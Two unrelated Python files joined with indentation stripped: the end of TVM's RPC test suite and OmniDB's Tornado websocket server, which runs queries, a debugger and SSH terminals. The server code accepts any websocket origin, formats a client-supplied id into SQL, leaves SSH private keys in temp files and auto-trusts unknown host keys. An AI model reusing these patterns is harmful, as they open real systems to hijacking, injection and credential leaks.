for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.numpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.numpy(), a_np)
np.testing.assert_equal(b.numpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# statrt the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.numpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
server.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
|
ws_core.py
|
import threading, time, datetime, json, uuid
from concurrent.futures.thread import ThreadPoolExecutor
import traceback
import tornado.ioloop
import tornado.web
import tornado.websocket
import tornado.template
import tornado.httpserver
from tornado import gen
import ssl,os
import OmniDB_app.include.Spartacus as Spartacus
import OmniDB_app.include.Spartacus.Database as Database
import OmniDB_app.include.Spartacus.Utils as Utils
import OmniDB_app.include.OmniDatabase as OmniDatabase
from enum import IntEnum
from datetime import datetime
import sys
from . import settings
from . import custom_settings
from django.contrib.sessions.backends.db import SessionStore
import logging
logger = logging.getLogger('OmniDB_app.QueryServer')
import os
import platform
import re
from tornado.options import options, define, parse_command_line
from . import ws_chat
from OmniDB.startup import clean_temp_folder
import sqlparse
import pexpect
sys.path.append('OmniDB_app/include')
from OmniDB_app.include import paramiko
from OmniDB_app.include import custom_paramiko_expect
class StoppableThread(threading.Thread):
def __init__(self,p1,p2,p3):
super(StoppableThread, self).__init__(target=p1, args=(self,p2,p3,))
self.cancel = False
def stop(self):
self.cancel = True
class StoppableThreadPool(ThreadPoolExecutor):
def __init__(self, p_max_workers=custom_settings.THREAD_POOL_MAX_WORKERS, p_tag={}):
super(StoppableThreadPool, self).__init__(max_workers=p_max_workers)
self.tag = p_tag
self.cancel = False
def stop(self, p_callback=None):
self.cancel = True
if p_callback is not None:
p_callback(self)
def start(self, p_function, p_argsList=[]):
for p_args in p_argsList:
self.submit(p_function, self, *p_args)
super(StoppableThreadPool, self).shutdown(True)
class request(IntEnum):
Login = 0
Query = 1
Execute = 2
Script = 3
QueryEditData = 4
SaveEditData = 5
CancelThread = 6
Debug = 7
CloseTab = 8
AdvancedObjectSearch = 9
Console = 10
Terminal = 11
Ping = 12
class response(IntEnum):
LoginResult = 0
QueryResult = 1
QueryEditDataResult = 2
SaveEditDataResult = 3
SessionMissing = 4
PasswordRequired = 5
QueryAck = 6
MessageException = 7
DebugResponse = 8
RemoveContext = 9
AdvancedObjectSearchResult = 10
ConsoleResult = 11
TerminalResult = 12
Pong = 13
class debugState(IntEnum):
Initial = 0
Starting = 1
Ready = 2
Step = 3
Finished = 4
Cancel = 5
connection_list = dict([])
def closeTabHandler(ws_object,p_tab_object_id):
try:
tab_object = ws_object.v_list_tab_objects[p_tab_object_id]
del ws_object.v_list_tab_objects[p_tab_object_id]
if tab_object['type'] == 'query':
try:
tab_object['omnidatabase'].v_connection.Cancel(False)
except Exception:
None
try:
tab_object['omnidatabase'].v_connection.Close()
except Exception as exc:
None
elif tab_object['type'] == 'debug':
tab_object['cancelled'] = True
try:
tab_object['omnidatabase_control'].v_connection.Cancel(False)
except Exception:
None
try:
tab_object['omnidatabase_control'].v_connection.Terminate(tab_object['debug_pid'])
except Exception:
None
try:
tab_object['omnidatabase_control'].v_connection.Close()
except Exception:
None
try:
tab_object['omnidatabase_debug'].v_connection.Close()
except Exception:
None
elif tab_object['type'] == 'terminal':
if tab_object['thread']!=None:
tab_object['thread'].stop()
if tab_object['terminal_type'] == 'local':
tab_object['terminal_object'].terminate()
else:
tab_object['terminal_object'].close()
tab_object['terminal_ssh_client'].close()
except Exception as exc:
None
def thread_dispatcher(self,args,ws_object):
message = args
v_response = {
'v_code': 0,
'v_context_code': 0,
'v_error': False,
'v_data': 1
}
try:
json_object = json.loads(message)
v_code = json_object['v_code']
v_context_code = json_object['v_context_code']
v_data = json_object['v_data']
v_response['v_context_code'] = v_context_code
#Login request
if v_code == request.Login:
ws_object.v_user_key = v_data
try:
v_session = SessionStore(session_key=v_data)['omnidb_session']
ws_object.v_session = v_session
v_response['v_code'] = response.LoginResult
ws_object.v_list_tab_objects = dict([])
ws_object.terminal_command_list = []
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception:
v_response['v_code'] = response.SessionMissing
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
elif v_code == request.Ping:
ws_object.last_ping_time = datetime.now()
v_response['v_code'] = response.Pong
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
#Cancel thread
if v_code == request.CancelThread:
try:
thread_data = ws_object.v_list_tab_objects[v_data]
if thread_data:
if thread_data['type'] == 'advancedobjectsearch':
def callback(self):
try:
self.tag['lock'].acquire()
for v_activeConnection in self.tag['activeConnections']:
v_activeConnection.Cancel(False)
finally:
self.tag['lock'].release()
thread_data['thread_pool'].stop(p_callback=callback)
else:
thread_data['thread'].stop()
thread_data['omnidatabase'].v_connection.Cancel(False)
except Exception as exc:
None;
#Close Tab
elif v_code == request.CloseTab:
for v_tab_close_data in v_data:
closeTabHandler(ws_object,v_tab_close_data['tab_id'])
#remove from tabs table if db_tab_id is not null
if v_tab_close_data['tab_db_id']:
try:
ws_object.v_session.v_omnidb_database.v_connection.Execute('''
delete from tabs
where tab_id = {0}
'''.format(v_tab_close_data['tab_db_id']))
except Exception as exc:
None
else:
try:
#Send Ack Message
v_response['v_code'] = response.QueryAck
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Getting refreshed session
s = SessionStore(session_key=ws_object.v_user_key)
v_session = s['omnidb_session']
ws_object.v_session = v_session
#Check database prompt timeout
if v_data['v_db_index']!=None:
v_timeout = v_session.DatabaseReachPasswordTimeout(v_data['v_db_index'])
if v_timeout['timeout']:
v_response['v_code'] = response.PasswordRequired
v_response['v_data'] = v_timeout['message']
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
return
if v_code == request.Terminal:
#create tab object if it doesn't exist
try:
tab_object = ws_object.v_list_tab_objects[v_data['v_tab_id']]
except Exception as exc:
tab_object = {
'thread': None,
'terminal_object': None
}
ws_object.v_list_tab_objects[v_data['v_tab_id']] = tab_object
start_thread = True
try:
#spawn local terminal
if v_data['v_ssh_id'] == -1:
start_thread = False
v_response['v_code'] = response.MessageException
v_response['v_data'] = 'Feature under development.'
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#if not v_session.v_super_user:
# start_thread = False
# v_response['v_code'] = response.MessageException
# v_response['v_data'] = 'Must be superuser to start a local terminal.'
# ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#else:
# tab_object['terminal_object'] = pexpect.spawn('/bin/bash',encoding='utf-8')
# tab_object['terminal_object'].send(v_data['v_cmd'])
# tab_object['terminal_type'] = 'local'
#spawn remote terminal
else:
v_conn_object = v_session.v_databases[v_data['v_ssh_id']]
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#ssh key provided
if v_conn_object['tunnel']['key'].strip() != '':
v_file_name = '{0}'.format(str(time.time())).replace('.','_')
v_full_file_name = os.path.join(settings.TEMP_DIR, v_file_name)
with open(v_full_file_name,'w') as f:
f.write(v_conn_object['tunnel']['key'])
client.connect(hostname=v_conn_object['tunnel']['server'],username=v_conn_object['tunnel']['user'],key_filename=v_full_file_name,passphrase=v_conn_object['tunnel']['password'],port=int(v_conn_object['tunnel']['port']))
else:
client.connect(hostname=v_conn_object['tunnel']['server'],username=v_conn_object['tunnel']['user'],password=v_conn_object['tunnel']['password'],port=int(v_conn_object['tunnel']['port']))
tab_object['terminal_ssh_client'] = client
tab_object['terminal_object'] = custom_paramiko_expect.SSHClientInteraction(client,timeout=60, display=False)
tab_object['terminal_object'].send(v_data['v_cmd'])
tab_object['terminal_type'] = 'remote'
except Exception as exc:
start_thread = False
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = str(exc)
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
if start_thread:
v_data['v_context_code'] = v_context_code
v_data['v_tab_object'] = tab_object
t = StoppableThread(thread_terminal,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'terminal'
tab_object['tab_id'] = v_data['v_tab_id']
t.start()
if v_code == request.Query or v_code == request.QueryEditData or v_code == request.SaveEditData or v_code == request.AdvancedObjectSearch or v_code == request.Console:
#create tab object if it doesn't exist
try:
tab_object = ws_object.v_list_tab_objects[v_data['v_tab_id']]
except Exception as exc:
tab_object = { 'thread': None,
'omnidatabase': None,
'database_index': -1,
'inserted_tab': False }
ws_object.v_list_tab_objects[v_data['v_tab_id']] = tab_object
None;
try:
v_conn_tab_connection = v_session.v_tab_connections[v_data['v_conn_tab_id']]
#create database object
if (tab_object['database_index']!=v_data['v_db_index'] or
v_conn_tab_connection.v_db_type!=tab_object['omnidatabase'].v_db_type or
v_conn_tab_connection.v_connection.v_host!=tab_object['omnidatabase'].v_connection.v_host or
str(v_conn_tab_connection.v_connection.v_port)!=str(tab_object['omnidatabase'].v_connection.v_port) or
v_conn_tab_connection.v_active_service!=tab_object['omnidatabase'].v_active_service or
v_conn_tab_connection.v_user!=tab_object['omnidatabase'].v_user or
v_conn_tab_connection.v_connection.v_password!=tab_object['omnidatabase'].v_connection.v_password):
v_database_new = OmniDatabase.Generic.InstantiateDatabase(
v_conn_tab_connection.v_db_type,
v_conn_tab_connection.v_connection.v_host,
str(v_conn_tab_connection.v_connection.v_port),
v_conn_tab_connection.v_active_service,
v_conn_tab_connection.v_active_user,
v_conn_tab_connection.v_connection.v_password,
v_conn_tab_connection.v_conn_id,
v_conn_tab_connection.v_alias,
p_conn_string = v_conn_tab_connection.v_conn_string,
p_parse_conn_string = False
)
tab_object['omnidatabase'] = v_database_new
tab_object['database_index'] = v_data['v_db_index']
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
v_data['v_context_code'] = v_context_code
v_data['v_database'] = tab_object['omnidatabase']
#Query request
if v_code == request.Query:
tab_object['tab_db_id'] = v_data['v_tab_db_id']
v_data['v_tab_object'] = tab_object
t = StoppableThread(thread_query,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'query'
tab_object['sql_cmd'] = v_data['v_sql_cmd']
tab_object['sql_save'] = v_data['v_sql_save']
tab_object['tab_id'] = v_data['v_tab_id']
#t.setDaemon(True)
t.start()
#Console request
if v_code == request.Console:
v_data['v_tab_object'] = tab_object
t = StoppableThread(thread_console,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'console'
tab_object['sql_cmd'] = v_data['v_sql_cmd']
tab_object['tab_id'] = v_data['v_tab_id']
#t.setDaemon(True)
t.start()
#Query edit data
elif v_code == request.QueryEditData:
t = StoppableThread(thread_query_edit_data,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'edit'
#t.setDaemon(True)
t.start()
#Save edit data
elif v_code == request.SaveEditData:
t = StoppableThread(thread_save_edit_data,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'edit'
#t.setDaemon(True)
t.start()
#Query Advanced Object Search
elif v_code == request.AdvancedObjectSearch:
v_response = {
'v_code': response.AdvancedObjectSearchResult,
'v_context_code': v_data['v_context_code'],
'v_error': False,
'v_data': 1
}
tab_object['tab_db_id'] = v_data['v_tab_db_id']
v_data['v_tab_object'] = tab_object
v_data['v_sql_dict'] = tab_object['omnidatabase'].AdvancedObjectSearch(v_data['text'], v_data['caseSensitive'], v_data['regex'], v_data['categoryList'], v_data['schemaList'], v_data['dataCategoryFilter'])
t = StoppableThreadPool(
p_tag = {
'activeConnections': [],
'lock': threading.RLock(),
'result': {}
}
)
tab_object['thread_pool'] = t
tab_object['type'] = 'advancedobjectsearch'
tab_object['tab_id'] = v_data['v_tab_id']
v_argsList = []
for v_key1 in v_data['v_sql_dict']:
if v_key1 == 'Data':
for v_key2 in v_data['v_sql_dict'][v_key1]:
v_sql = v_data['v_sql_dict'][v_key1][v_key2]
v_argsList.append([v_key1, v_key2, v_sql, v_data, ws_object])
else:
v_sql = v_data['v_sql_dict'][v_key1]
v_argsList.append([v_key1, None, v_sql, v_data, ws_object])
log_start_time = datetime.now()
log_status = 'success'
try:
#Will block here until thread pool ends
t.start(thread_advancedobjectsearch, v_argsList)
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_duration': v_duration,
'v_result': t.tag['result']
}
except Exception as exc:
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
log_status = 'error'
v_response['v_data'] = {
'message' : str(exc).replace('\n','<br>'),
'v_duration': v_duration
}
v_response['v_error'] = True
#If the thread pool wasn't previously cancelled
if not t.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Debugger
elif v_code == request.Debug:
#New debugger, create connections
if v_data['v_state'] == debugState.Starting:
try:
v_conn_tab_connection = v_session.v_tab_connections[v_data['v_conn_tab_id']]
v_database_debug = OmniDatabase.Generic.InstantiateDatabase(
v_conn_tab_connection.v_db_type,
v_conn_tab_connection.v_connection.v_host,
str(v_conn_tab_connection.v_connection.v_port),
v_conn_tab_connection.v_active_service,
v_conn_tab_connection.v_active_user,
v_conn_tab_connection.v_connection.v_password,
v_conn_tab_connection.v_conn_id,
v_conn_tab_connection.v_alias,
p_conn_string = v_conn_tab_connection.v_conn_string,
p_parse_conn_string = False
)
v_database_control = OmniDatabase.Generic.InstantiateDatabase(
v_conn_tab_connection.v_db_type,
v_conn_tab_connection.v_connection.v_host,
str(v_conn_tab_connection.v_connection.v_port),
v_conn_tab_connection.v_active_service,
v_conn_tab_connection.v_active_user,
v_conn_tab_connection.v_connection.v_password,
v_conn_tab_connection.v_conn_id,
v_conn_tab_connection.v_alias,
p_conn_string = v_conn_tab_connection.v_conn_string,
p_parse_conn_string = False
)
tab_object = { 'thread': None,
'omnidatabase_debug': v_database_debug,
'omnidatabase_control': v_database_control,
'debug_pid': -1,
'cancelled': False,
'tab_id': v_data['v_tab_id'],
'type': 'debug' }
ws_object.v_list_tab_objects[v_data['v_tab_id']] = tab_object
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Existing debugger, get existing tab_object
else:
tab_object = ws_object.v_list_tab_objects[v_data['v_tab_id']]
v_data['v_context_code'] = v_context_code
v_data['v_tab_object'] = tab_object
# Instead of getting the connection port which can be forwarded, we get the local PostgreSQL port
#v_data['v_port'] = v_session.v_databases[v_data['v_db_index']]['database'].v_port
v_data['v_port'] = v_session.v_databases[v_data['v_db_index']]['database'].v_connection.ExecuteScalar('show port')
t = StoppableThread(thread_debug,v_data,ws_object)
#tab_object['thread'] = t
#t.setDaemon(True)
t.start()
except Exception as exc:
v_response['v_code'] = response.SessionMissing
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_dispatcher_terminal_command(self,args,ws_object):
message = args
while True:
ws_object.terminal_lock.acquire()
if self.cancel:
break
while True:
try:
element = ws_object.terminal_command_list.pop(0)
tab_object = ws_object.v_list_tab_objects[element['v_tab_id']]
tab_object['terminal_object'].send(element['v_cmd'])
except Exception:
break
def thread_client_control(self,args,object):
message = args
while True:
time.sleep(300)
for k in list(connection_list.keys()):
client_object = connection_list[k]
try:
if ((datetime.now() - client_object.last_ping_time).total_seconds() > 600):
del connection_list[k]
client_object.close()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
class WSHandler(tornado.websocket.WebSocketHandler):
def open(self):
client_id = str(uuid.uuid4())
self.client_id = client_id
self.last_ping_time = datetime.now()
connection_list[client_id] = self
self.event_loop = tornado.ioloop.IOLoop.instance()
spawn_thread = False
lock = threading.Lock()
self.terminal_lock = lock
self.terminal_lock.acquire()
self.terminal_thread = StoppableThread(thread_dispatcher_terminal_command,'',self)
self.terminal_thread.start()
None
def on_message(self, message):
try:
json_object = json.loads(message)
v_code = json_object['v_code']
v_context_code = json_object['v_context_code']
v_data = json_object['v_data']
spawn_thread = True
if v_code == request.Terminal:
#create tab object if it doesn't exist
try:
tab_object = self.v_list_tab_objects[v_data['v_tab_id']]
#object exists, send new command
spawn_thread = False
self.terminal_command_list.append({'v_tab_id': v_data['v_tab_id'], 'v_cmd': v_data['v_cmd']})
try:
self.terminal_lock.release()
except Exception as exc:
None
except Exception as exc:
None
if spawn_thread:
t = StoppableThread(thread_dispatcher,message,self)
t.start()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def on_close(self):
try:
#closing terminal thread
try:
self.terminal_thread.stop()
self.terminal_lock.release()
except Exception as exc:
None
#removing client object from list of clients
try:
del connection_list[self.client_id]
except Exception as exc:
None
for k in list(self.v_list_tab_objects.keys()):
closeTabHandler(self,k)
except Exception:
None
def check_origin(self, origin):
return True
def start_wsserver_thread():
t = threading.Thread(target=start_wsserver)
t.setDaemon(True)
t.start()
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
def start_wsserver():
logger.info('''*** Starting OmniDB ***''')
try:
application = tornado.web.Application([
(r'' + settings.PATH + '/ws', WSHandler),
(r'' + settings.PATH + '/wss',WSHandler),
(r'' + settings.PATH + '/chatws', ws_chat.WSHandler),
(r'' + settings.PATH + '/chatwss',ws_chat.WSHandler)
])
if settings.IS_SSL:
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.options |= ssl.OP_NO_TLSv1
ssl_ctx.options |= ssl.OP_NO_TLSv1_1
ssl_ctx.load_cert_chain(settings.SSL_CERTIFICATE,
settings.SSL_KEY)
server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_ctx)
else:
server = tornado.httpserver.HTTPServer(application)
#Start thread that controls clients
thread_clients = StoppableThread(thread_client_control,None,None)
thread_clients.start()
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
server.listen(settings.OMNIDB_WEBSOCKET_PORT,address=settings.OMNIDB_ADDRESS)
tornado.ioloop.IOLoop.instance().start()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
def send_response_thread_safe(ws_object,message):
try:
ws_object.write_message(message)
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
def GetDuration(p_start, p_end):
duration = ''
time_diff = p_end - p_start
if time_diff.days==0 and time_diff.seconds==0:
duration = str(time_diff.microseconds/1000) + ' ms'
else:
days, seconds = time_diff.days, time_diff.seconds
hours = days * 24 + seconds // 3600
minutes = (seconds % 3600) // 60
seconds = seconds % 60
